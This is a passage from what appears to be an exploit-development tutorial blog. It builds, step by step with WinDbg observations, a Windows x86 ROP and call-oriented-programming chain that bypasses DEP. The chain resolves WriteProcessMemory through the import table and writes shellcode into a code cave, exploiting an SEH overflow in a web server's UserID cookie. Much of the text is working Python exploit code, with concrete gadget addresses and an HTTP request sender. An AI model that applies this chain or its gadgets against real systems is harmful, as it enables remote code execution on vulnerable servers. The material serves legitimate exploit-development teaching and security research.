Although EAX is relatively close to ESP - it is still a decent ways away. Currently, EAX (which now contains the old value of EBP) is 0xfec bytes away from ESP.

To compensate for this, we will manipulate EAX to contain the address at ESP + 0x38.

Why ESP + 0x38 instead of just ESP you ask? This is a “preparatory” procedure (manipulating EAX to contain the address of ESP + 0x38).

As we will see later on, we would like to preserve an address around ESP into another “common” register, ECX. ECX is a register that is used as a “counter” (although technically it is a general purpose register). This means that ECX generally is a part of some more useful ROP gadgets.

In order to do this, the stack will eventually need to be increased by 0x24 bytes to get the value (technically future value) of ESP into ECX, due to the nature of the ROP gadgets available within the process memory. A ROP gadget will inadvertently perform an add esp, 0x24, resulting in collateral damage to get what we need accomplished, accomplished. There will be 4 ROP gadgets (plus an additional DWORD that will be “popped” into a register), for a total of 0x14 (20 decimal) bytes, that will need to be executed between now and when that add esp, 0x24 gadget is executed (0x38 - 0x24 = 0x14).

This is reason why we will set EAX to the value of ESP + 0x38 instead of ESP + 0x24, because we will need 0x14 bytes worth of ROP gadgets between then and now. By the time the ROP gadgets before the add esp, 0x24 instruction are executed, the value in EAX will be ESP + 0x24. However, if we loaded ESP + 0x24 into EAX now, then by the time we reach the add esp, 0x24 instruction, EAX will contain a value of ESP + 0x10.

Knowing this, and knowing that we would like EAX and ECX to be equal to the current value of ESP after the ESP + 0x38 stack manipulation occurs - we will prepare EAX in advance.

Note that this is by no means a requirement (getting EAX and ECX set to the EXACT value of ESP) when doing ROP. This will just make life easier in the future. If this doesn’t make sense now, do not worry. Just focus on the fact we would like to get EAX closer to ESP for the time being.

0x10018606: pop ecx ; ret  ;  (1 found)
0xffffefe0 (Value to be popped into EAX. This is the negative representation of the distance between the current value of EAX and ESP + 0x38). 
0x1001283e: sub eax, ecx ; ret  ;  (1 found)

Why the negative distance you ask? Let’s say we wanted to add 0x1024 to EAX. If we loaded 0x1024 into ECX, to add it to EAX, ECX would contain 0x00001024. As we can clearly see, ECX will contain NULL bytes - which will kill our exploit. Instead, we will use the negative representation of numbers and perform subtraction in order to get around this problem.

After the aforementioned gadget of exchanging EBP and EAX, program execution hits the pop ecx gadget.

The negative value of the distance between EAX and ESP + 0x38 is placed into ECX.

Program execution then transfers to the sub eax, ecx ROP gadget, which will place the difference into the EAX register.

This yields our desired result.

Note that 0xCCCCCCCC is denoted as a visual for where we hope our program execution resumes at after all of this craziness. Our goal is for when the last ret occurs, it returns into this DWORD.

The goal now is to get the current value of EAX into ECX. There is a nice ROP gadget that will do this for us.

0x61c6588d: mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave  ; ret  ;  (1 found)

This gadget will take EAX and place it into ECX. Then, a mov eax, ecx instruction will occur - which is meaningless because ECX and EAX already contain the same value - meaning this part of the gadget basically just serves as a “NOP” of sorts. ESP then gets raised by 0x24 bytes, which we can compensate for - so this isn’t an issue. pop ebx can be compensated for as well, but leave will be a problem as this will directly manipulate ESP, throwing our ROP execution flow off.

leave, from a technical perspective, will perform a mov esp, ebp and a pop ebp instruction.

mov esp, ebp will place EBP into ESP. Let’s think about how we can leverage this.

We know that currently EAX contains our target address. We also can recall from earlier that EBP is currently set to 0. If we could place EAX into EBP BEFORE the leave instruction executes - it would set ESP to ESP + 0x24 (at the time of the instruction executing) because of the mov esp, ebp instruction - which sets ESP to whatever EBP is. Due to the add esp, 0x24 gadget that occurs before the leave instruction - this would actually end up setting ESP to ESP, which is what we want. The goal here is to restore ESP back to our controlled data, which consists of our ROP gadgets.

It is a bit of a mouthful and “mind bender” of sorts - so do not worry if it is hazy or confusing at the moment. Viewing this step by step in the debugger will help make sense of all of this.

Note, after each gadget - obviously the value of ESP changes. For completeness sake, until we hit the add esp, 0x24 gadget - we will refer to the “target” ESP + 0x38 address as ESP + 0x38 (even though the offset will technically shrink after each gadget is executed).

First, as mentioned above, we need to get the value in EAX into EBP to prepare for the leave instruction.

0x61c30547: add ebp, eax ; ret  ;  (1 found)

How does adding EAX to EBP place EAX into EBP? Recall that EBP is set to 0 and EAX contains the memory address of ESP + 0x38. That address of ESP + 0x38 will get added to the number 0, which doesn’t alter it in any way, and the result of the addition is placed into EBP - essentially “moving” the address into EBP.

Let’s step through all of this in WinDbg - to make things a bit more clear.

First, program execution reaches the add ebp, eax instruction.

EBP currently is set to 0 and EAX is set to ESP + 0x38

Stepping through the instruction yields the desired result of placing ESP + 0x38 into EBP.

After EBP is prepared, program execution reaches the next ROP gadget.

After stepping through the mov ecx, eax gadget - ECX and EAX are now both set to ESP + 0x38.

Stepping through the mov eax, ecx instruction doesn’t affect the EAX or ECX registers at all, as ECX (which is already equal to EAX) is placed into EAX.

Taking a look on the stack now, we can see our compensation for add esp, 0x24 and pop ebx between the address before 0xCCCCCCCC

Program executing has also reached the add esp, 0x24 instruction.

Stepping through the instruction, the stack as been set to the same values in EAX, ECX, and EBP.

Then, pop ebx clears the last bit of “padding” on the stack.

After all of this has occurred, the leave instruction is loaded up for execution.

leave ; ret is executed, and the execution of our ROP chain resumes its course - all while preserving ESP into ECX and EAX!

WriteProcessMemory() Parameters

Recall that we are dealing with the x86 architecture, meaning function calls go through __stdcall instead of __fastcall. This means that instead of placing our function arguments into RCX, RDX, R8, R9, RSP + 0x20, and so on - we can just simply place our parameters on the stack, as such.

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Let’s talk about where these parameters come from.

To “bypass” Windows’ ASLR (the OS DLLs still use ASLR, even if this application doesn’t) - we can leverage the Import Address Table (IAT).

Whenever a program calls a Windows API function - it does not do so directly. A special table, within the process space, known as the IAT essentially contains pointers to each needed API function.

The IAT for this application is located at the .exe base + 0x166000 and it is 0xC40 bytes in size.

As is seen in the image above, the IAT just contains pointers to Windows API functions. Meaning each of these functions points to a Windows API function.

We have “the base address” of each module (in reality, each module is just not compiled with ASLR) - so that is no problem. However, the value that each of these functions points to (which is a Windows API function) will change upon reboot.

The way to get around this, would be to load one of these IAT entries into a register we control (such as ECX) and then perform a mov ecx, dword ptr [ecx] instruction - an arbitrary read.

This would extract whatever ECX points to (which is a Windows API function) and place it into ECX. Even though Windows will randomize the addresses of the API, we can still leverage the fact each IAT will always point to the same Windows API function (even if the address of the API changes) to make sure this is not a problem.

Although the IAT for this application doesn’t directly contain a function pointer to kernel32WriteProcessMemory - it does contain pointers to other kernel32.dll pointers, such as kernel32!WriteFileImplementation. We also know that the distance between each function with a DLL DOESN’T CHANGE. This means, the distance between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory will always remain the same for the current patch level and OS version.

This gives us a primitive to dynamically resolve the location of kernel32!WriteProcessMemory.

crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)

The next “parameter” is not really even a parameter at all. Similarly to my last ROP post, this will be used as the address in which program execution will transfer to AFTER the call to kernel32!WriteProcessMemory is made. This will also be the same address as our shellcode.

Why 0x61c72530 specifically?

sqlite3.dll is a module of the application - meaning it is a part of process memory. Since this DLL is required for the application to work, we can target it as a place to write our shellcode. With this method of ROP, we need to find an executable portion of memory within the application and its modules. Then, using the call to kernel32!WriteProcessMemory - we will write our shellcode to this executable portion of memory. Using the command !dh sqlite3 in WinDbg, we can determine the .text section of the portable executable has execute permissions. Also recall that even without write permissions, we can still write our shellcode if we “proxy” the write through the API call.

Viewing the .text section address - we can see that the address chosen is just an executable “code cave” that is not initialized to any memory - meaning that if we corrupt this memory, the program shouldn’t care.

This means, after the function call is completed and our shellcode is written here - program execution will transfer to this address.

crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)

The handle parameter is quite easy to fill - we can even use a static value. According to Microsoft Docs, GetCurrentProcess() returns a handle to the current process. More specifically, it returns a “pseudo handle” to the current process. A pseudo handle, denoted by -1 or 0xFFFFFFFF, is “special” constant that refers to a handle to the current process. This means, whenever a Windows API function requests a handle (generally in user mode), passing 0xFFFFFFFF will tell the API in question to utilize a handle to the current process. Since we would like to write our shellcode to memory within the process space - passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we would like to write the memory to virtual memory within the current process space.

crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 

lpBaseAddress will be the address of our shellcode, as already outlined by the “return” parameter.

crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)

lpBuffer will be a pointer to our shellcode (which will first need to be written to the stack). We will dynamically resolve this with ROP gadgets.

crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 

nSize will be the size of our shellcode.

crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Lastly, lpNumberofBytesWrittne will be any writable address.

Let’s ROP v2!

We will be using what some have dubbed the “pointer” method of ROP (when it comes to x86 at least), where we will place these parameter “placeholders” on the stack and then dynamically change what these parameters point to in order to make a successful function call. Here is the PoC we will be using.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX vai "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack)  - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host:\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer:\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 80))

The above PoC places the parameters on the stack and also performs a “jump” over them with add esp, 0x1C. Let’s examine this in the debugger.

The following is the state of the stack - with the kernel32!WriteProcessMemory parameters outlined in red.

The address 0x10015eb4 is a ROP gadget that will add to ESP. After this gadget is executed, we can see the stack moves further down.

We can see that we have moved further into our buffer, where our future ROP gadgets will reside. The parameters for the function call are now “behind” where program execution is - meaning we will not inadvertently corrupt these parameters because they are not within the current execution flow.

Now that this is out of the way - we can “officially” begin our ROP chain to obtain code execution.


The first thing that we will do is get the lpBuffer parameter, which will contain the pointer to the base of our shellcode, situated. Recall that kernel32!WriteProcessMemory will take in a source buffer and write it somewhere else. Since we have control of the stack, we will just preemptively place our shellcode there. This is where the headache of storing an address near the stack in EAX and ECX will come into play.

As it currently stands, ECX is 0x18 bytes behind the parameter placeholder for lpBuffer.

The goal right now is to increase ECX by 0x18 bytes. Here is the reason for this.

Let’s say we get the parameter placeholder’s location (e.g. the virtual memory address, not the 0x11111111 itself) in ECX (which we will). If we were to read the value of ECX, we would be reading the value 0x2826930. However, if we read the value of dword ptr [ecx] instead - we would be reading the actual value of 0x11111111.

The first part of the image above shows the value of the address itself. The second part of the image shows what happens when we “dereference” (using poi in WinDbg), or extract the value a memory address is pointing to. We can leverage this, by using an arbitrary write primitive. When we get the address of the lpBuffer parameter into ECX - we then will not overwrite ECX, but rather dword ptr [ecx] - which will force the address on the stack (which contains the parameter placeholder) to point to something other than 0x11111111.

Remember - every time the process is terminated and restarted - the virtual memory on the stack changes. This is why we need to dynamically resolve this parameter, instead of hardcoding an address.

We will use the following ROP gadgets, in order to make ECX contain the stack address holding the lpBuffer parameter placeholder.

crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

Two things about the above ROP gadgets. First, the clc instruction.

clc is an assembly instruction that clears the “carry” flag (the CF register). None of our ROP gadgets, now or later, depend on the state of this flag - so it is okay that this instruction resides in this gadget. Additionally, we have a mov edx, dword [ecx-0x4] instruction. Currently, we are not using the EDX register for anything - so this instruction will not consequently disrupt what we are trying to achieve.

Also notably, this set of ROP gadgets only increases ECX by 16 decimal bytes (0x10 hexadecimal) - even though the parameter placeholder for lpBuffer is located 0x18 bytes away (24 decimal bytes).

This is again a “preparatory” procedure for our future ROP gadgets. We need a gadget, similar to the following: mov dword ptr [ecx], reg, where reg refers to any register that contains the stack address of our shellcode and dword ptr [ecx] contains the stack address which is currently serving as the parameter placeholder for lpBuffer. This will essentially take what ECX is pointing to, which is 0x11111111, and overwrite the pointer with the actual address of our shellcode.

However, there were no such gadgets that were found easily in the process memory. The closest gadget was mov dword ptr [ecx+0x8], eax. Knowing this, we will only raise ECX to 0x10 instead of 0x18 - due to the gadget overwriting ECX’s pointer at an offset of 0x8 (0x18 - 0x10 = 0x8).

The key is now to give some padding between the space on the stack for our future ROP gadgets and our shellcode. To do this, we will provide approximately 0x300 bytes of space on the stack for remaining ROP gadgets. This will allow us to “simulate” the rest of our ROP gadgets and choose a place on the stack that our shellcode will go, and start performing these calculations now. Think of these 0x300 bytes as “ROP gadget placeholders”. If perhaps we would need more than 0x300 bytes, due to more ROP gadgets needed than anticipated, we would move our shellcode down lower. We will “aim” for 0x300 bytes down the stack, and we will add NOPs to compensate for any of the unused 0x300 bytes (if necessary). The following ROP gadgets can accomplish loading the location of our “shellcode” (future shellcode) into EAX.

crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 (0x2dc) bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

The location where our shellcode will be (your location can be different, depending on how far down the stack you wish to place it) is 0x2dc bytes away from the value in EAX. To load our shellcode value into EAX, we need to increase it by 0x2dc bytes. Obviously, this is too much for just consecutive inc eax gadgets. Additionally, if we directly add to EAX - the NULL byte problem would kill our exploit. This is because a 32-bit register, like EAX, needs the value 0x000002dc to completely fill its contents. To address this, we can use negative numbers and subtraction to yield the same result!

The negative representation of 0x2dc will be loaded into ESI. We will then need to also compensate for the add esp + 0x8 instruction. To do this, we will add 0x8 bytes of padding so no gadgets get “jumped over”. Then, we will subtract the value in ESI from EAX - and place the difference in EAX. This will result in the address of where our shellcode will go being placed into EAX. Additionally, we need compensate for two pop gadgets.

Let’s view the ROP routine in WinDbg. Program execution reaches our ECX manipulating gadget(s).

Stepping through the 16 gadgets, ECX is now 8 bytes behind the lpBuffer parameter - as expected.

Program execution then redirects to the EAX manipulation routine.

The intended negative value of 0x2dc is placed into ESI.

The value is then subtracted and the difference is placed in EAX! We have successfully loaded the address of where our shellcode will go, further down the stack, into EAX.

Note, the address where our shellcode will go is denoted with NOPs in the above image for visual effect. This was done in the debugger to outline the process taken here.

The last step is to utilize the following ROP gadget to change the lpBuffer parameter placeholder to point to the legitimate parameter (which is the shellcode location down the stack).

crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the gadget in question.

As we can already see from the image above, 0x11111111 (which is the parameter placeholder for lpBuffer), is going to be what is overwritten with the contents of EAX (which contains the stack address which points to our shellcode.

State of the lpBuffer parameter placeholder before the instruction is stepped through.

After stepping through the instruction - we can see the lpBuffer parameter placeholder has been dynamically changed to the correct address!


nSize, as you can recall from earlier, refers to the size of our region of memory we would like written in the process space. We would like the size of our shellcode to be about 0x180 bytes (384 decimal) - as this is more than enough for any type of shellcode.

Since ECX and EAX are being used for stack addresses - let’s use another register for this parameter. Let’s use EDX.

Parsing the application for gadgets, there is a nice one for adding directly to EDX in multiples of 0x20.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Although the gadget is very nice, as we just need to add to EDX until the value of 0x180 is placed in it, the gadget doesn’t end with a ret - meaning it will not return back to the stack and pick up the next gadget.

Instead, this gadget performs a call edi instruction. This, at first glance - will completely kill our ROP chain, as execution will not redirect back to the stack. However, there is a way around this - with a technique called Call-oriented Programming (COP).

Essentially, since we know that EDI will be called, we could pop a ROP gadget, which would perform an add esp, X ; ret. Why add, esp X you may ask?

As you may, or may not, know - when a call instruction is executed - it pushes its return address onto the stack. This is done so the caller knows where to return after it is done executing. However, we can just execute an add esp X gadget to jump over this return address and back into our ROP chain. However, there is one more thing that we need to take into account from our gadget, and that is push edx.

This will push the EDX register onto the stack before the call instruction pushes its return address onto the stack - meaning a total of 0x8 (2 DWORDS) bytes will be pushed onto the stack. To compensate for this, we will load an add esp, 0x8 ; ret.

Here is how our routine of gadgets will look, in totality.

crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Let’s view this all in the debugger.

First, program execution hits our pop edi instruction, which will load the “return to the stack” ROP gadget into EDI.

pop edi places the instruction into EDI.

The next gadget is hit, which will set EDX to zero so we can start with a “clean slate”.

Now, program execution is ready for the add edx, 0x20 gadget - which will be repeated until EDX has been filled with 0x180.

push edx is then executed, resulting in EDX being placed onto the stack.

call edi is now about to be executed. Stepping through the instruction, with t in WinDbg, pushes the caller’s return address onto the stack.

Our add esp, 0x8 routine is queued up for execution, and successfully returns us back to the stack - where the exact same routine will be repeated until 0x180 is placed into EDX.

After repeating the routine, EDX now contains 0x180.

Now that EDX contains our intended value of 0x180, we can eventually use the same mov dword ptr [reg], edx primitive to overwrite the nSize parameter placeholder with out intended value of 0x180.

We used the ECX register, which currently still contains the address on the stack that holds the now correct lpBuffer size parameter - 0x8 (remember, ECX was used at an offset of 0x8 last time, meaning it is technically 0x8 bytes behind the lpBuffer parameter, which is 4 bytes behind the nSize parameter placeholder - for a total of 0xC bytes, or 12 decimal bytes).

As you can see, 0x4 bytes after lpBuffer comes the nSize parameter (as denoted by 0x22222222).

Utilizing the same gadgets from a previous ROP routine - we can increase ECX by 12 (0xC) decimal bytes, to load the parameter placeholder address for nSize.

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
